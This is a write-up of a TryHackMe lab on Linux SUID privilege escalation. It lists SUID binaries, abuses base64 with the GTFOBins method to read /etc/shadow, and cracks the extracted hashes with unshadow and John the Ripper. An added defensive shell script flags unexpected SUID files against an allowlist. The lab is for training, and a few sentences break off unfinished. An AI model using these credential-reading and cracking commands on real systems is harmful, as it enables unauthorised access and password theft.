TryHackMe - Linux Privilege Escalation: SUID
This article discusses the solution for TryHackMe's Linux Privilege Escalation SUID task, so proceed with caution.
I would suggest that you try to solve it on your own as you will learn a lot in the process of attempting. Try to give it your all until you feel that you are really hopelessly stuck.
Privilege Escalation SUID Solution
Which user shares the name of a great comic book writer?
What is the password of user2?
Run find / -type f -perm -04000 -ls 2>/dev/null to list files that have SUID or SGID bits set.
Go to https://gtfobins.github.io/#+suid to get the list of applications that are exploitable when the SUID bit is set.
We can see that base64 is exploitable, so we can escalate privileges using SUID.
Using the guide that GTFOBins gives us, we execute the following:
LFILE=/etc/shadow
base64 "$LFILE" | base64 --decode
Create a local file shadow.txt and copy the content from the target machine.
Unshadow the files:
unshadow passwd.txt shadow.txt > passwords.txt
Run john the ripper on
john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt
What is the content of the flag3.txt file?
Let's first check the home directory for the
Let's run the command provided by GTFOBins again.
base64 "$LFILE" | base64 --decode
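From the defender's side, the same find listing can be checked against a baseline so that an unexpected SUID binary such as base64 stands out. The script below is an added example, not part of the original walkthrough; the allowlist, the sample listing, the report-tool path and the function name unexpected_suid are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: baseline audit of SUID files. Reads `find ... -ls` lines on
# stdin and prints every SUID path that is not in the expected-SUID allowlist.

# Assumed baseline for illustration; build the real one from a known-good image.
SUID_ALLOWLIST='/bin/su
/bin/mount
/bin/umount
/usr/bin/passwd
/usr/bin/sudo'

# Constructed sample of `find / -type f -perm -04000 -ls` style output.
SAMPLE_FIND_LS='  1722   44 -rwsr-xr-x   1 root   root    43352 Sep  5  2019 /bin/su
  1654   60 -rwsr-xr-x   1 root   root    59640 Mar 22  2019 /usr/bin/passwd
  1666   44 -rwsr-xr-x   1 root   root    43088 Mar  5  2020 /usr/bin/base64
  2011  148 -rwsr-xr-x   1 root   root   149080 Jan 31  2020 /usr/bin/sudo
  2040   12 -rwxr-xr-x   1 root   root    10232 Mar 28  2017 /usr/bin/not-suid
  2099  304 -rwsr-xr-x   1 root   root   311008 Mar  6  2020 /usr/local/bin/report-tool'

unexpected_suid() {
    # Column 3 of -ls output is the mode string; an "s" or "S" in the owner
    # execute slot (4th character) means the SUID bit is set. The path starts
    # at column 11; rejoin any remaining fields so a path containing
    # whitespace is not truncated.
    awk 'substr($3, 4, 1) ~ /[sS]/ {
             path = $11
             for (i = 12; i <= NF; i++) path = path " " $i
             print path
         }' |
    while IFS= read -r path; do
        # Exact, whole-line match against the allowlist; print on a miss.
        printf '%s\n' "$SUID_ALLOWLIST" | grep -Fxq -- "$path" || printf '%s\n' "$path"
    done
}

# Demo on the constructed sample. On a live host:
#   find / -type f -perm -04000 -ls 2>/dev/null | unexpected_suid
printf '%s\n' "$SAMPLE_FIND_LS" | unexpected_suid
```

Any path this prints is a candidate for chmod u-s unless there is a documented reason for the binary to run with its owner's privileges.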
Until next time. Keep learning.
Stay stoked and code. :)